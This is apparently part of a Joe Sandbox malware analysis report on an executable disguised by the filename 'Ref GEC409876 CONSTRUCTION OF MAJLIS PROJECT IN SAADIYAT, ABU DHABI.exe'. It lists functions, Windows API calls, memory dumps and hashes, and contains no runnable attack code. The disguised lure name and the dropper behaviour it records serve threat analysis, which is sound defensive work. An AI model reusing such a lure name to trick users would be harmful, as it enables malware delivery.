                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 589700163-328738330
                                                                                                                          • Opcode ID: a15e7b9c92e4fac5837ba80ec03ec375c661933bbdfd6cc4147916c8a1456e26
                                                                                                                          • Instruction ID: 01726bbc4e2c448ec391ae67e872290cbd2d47d18a3812a7b55dff680105d5d8
                                                                                                                          • Opcode Fuzzy Hash: a15e7b9c92e4fac5837ba80ec03ec375c661933bbdfd6cc4147916c8a1456e26
                                                                                                                          • Instruction Fuzzy Hash: F511AB1580061295DB313B549C44B77A2F8EF99790F5240BFED96B32C0E7BC5C9286BD
                                                                                                                          Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                                                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                                                                                          • GetSysColor.USER32(?), ref: 00404265
                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                                                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                                                                                          Function 004027E5 Relevance: 10.6, APIs: 7, Instructions: 75memoryfileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405BF8: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00405BFC
                                                                                                                            • Part of subcall function 00405BF8: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00402809
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040288F
                                                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040285E
                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                            • Part of subcall function 00403062: SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                                            • Part of subcall function 00403062: WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 004028A3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 64603807-0
                                                                                                                          • Opcode ID: 0d0ac1bbfc16594790c3092933b554426185fd63630a1a508f3210ce7ca09ae8
                                                                                                                          • Instruction ID: 8d03524e730972d0d2727a111309b29fb4c1dd807b4b6f2d90347fc94b995f65
                                                                                                                          • Opcode Fuzzy Hash: 0d0ac1bbfc16594790c3092933b554426185fd63630a1a508f3210ce7ca09ae8
                                                                                                                          • Instruction Fuzzy Hash: A5215C72C00118BFDF11AFA4CE89CAE7E79EF08364B14463AF514762E0C6795E419BA9
                                                                                                                          Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                          • wsprintfW.USER32 ref: 00402D81
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(000600C7,?,0005F700), ref: 00402D13
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                          • Opcode ID: e27c2f7dbee131dbdfcdd41b567a98c3097ab4c9f03de6157def9e8d5b287b15
                                                                                                                          • Instruction ID: 78f52ac4307216ae4daf114a653e214d9194ffd889c5bb91718f5c3abb157098
                                                                                                                          • Opcode Fuzzy Hash: e27c2f7dbee131dbdfcdd41b567a98c3097ab4c9f03de6157def9e8d5b287b15
                                                                                                                          • Instruction Fuzzy Hash: D1015E31909220EBC7616B64EE5DBDA3AA8AF00704B14457BF905B11F5C6B85C45CFAE
                                                                                                                          Function 00404AFE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B19
                                                                                                                          • GetMessagePos.USER32 ref: 00404B21
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404B3B
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B4D
                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B73
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                          • String ID: f
                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                          • Instruction ID: 7d165c7f7153624e3963f679d066e3c154625e4b871d361bb7407d5cf98d8b00
                                                                                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                          • Instruction Fuzzy Hash: 97014C71D00219BADB00DB94DD85FFEBBBCAB59711F10412ABB10B71D0D7B4A9018BA5
                                                                                                                          Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                          • wsprintfW.USER32 ref: 00402CD1
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                          • Opcode ID: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                                                                                          • Instruction ID: 1a6e545745197b7d5f0e024d91f0b7ce6738c211f373f8126abe8c19e9ad5020
                                                                                                                          • Opcode Fuzzy Hash: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                                                                                          • Instruction Fuzzy Hash: A6F03670504108BBEF205F50DD4ABEE3768FB00309F00843AFA16B51D1DBB95959DF59
                                                                                                                          Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1968005131.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968042023.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968066421.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1780285237-0
                                                                                                                          • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                          • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                          • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                          • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                          Function 004049F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                                                                          • wsprintfW.USER32 ref: 00404A9A
                                                                                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                          • String ID: %u.%u%s%s$&B
                                                                                                                          • API String ID: 3540041739-2907463167
                                                                                                                          • Opcode ID: 9513d2e047af43577a24336e7432a2aba40062ca47d724a60bbce7168ae92968
                                                                                                                          • Instruction ID: ab388700b69d78aa859054a1700c1a1d69e67ce61d201efd873ebc4ad7f6fd90
                                                                                                                          • Opcode Fuzzy Hash: 9513d2e047af43577a24336e7432a2aba40062ca47d724a60bbce7168ae92968
                                                                                                                          • Instruction Fuzzy Hash: 4F11D8736441282BDB00656D9C45E9F328DDB85334F154237FA25F71D1EA78CC2286E9
                                                                                                                          Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1968005131.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968042023.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968066421.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2979337801-0
                                                                                                                          • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                          • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                                          • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                          • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                                          Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                          • GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1968005131.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968042023.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968066421.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1148316912-0
                                                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                          Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                                                                                          • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                                                                                          • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                                                                                          • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                          Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(?), ref: 00401D44
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
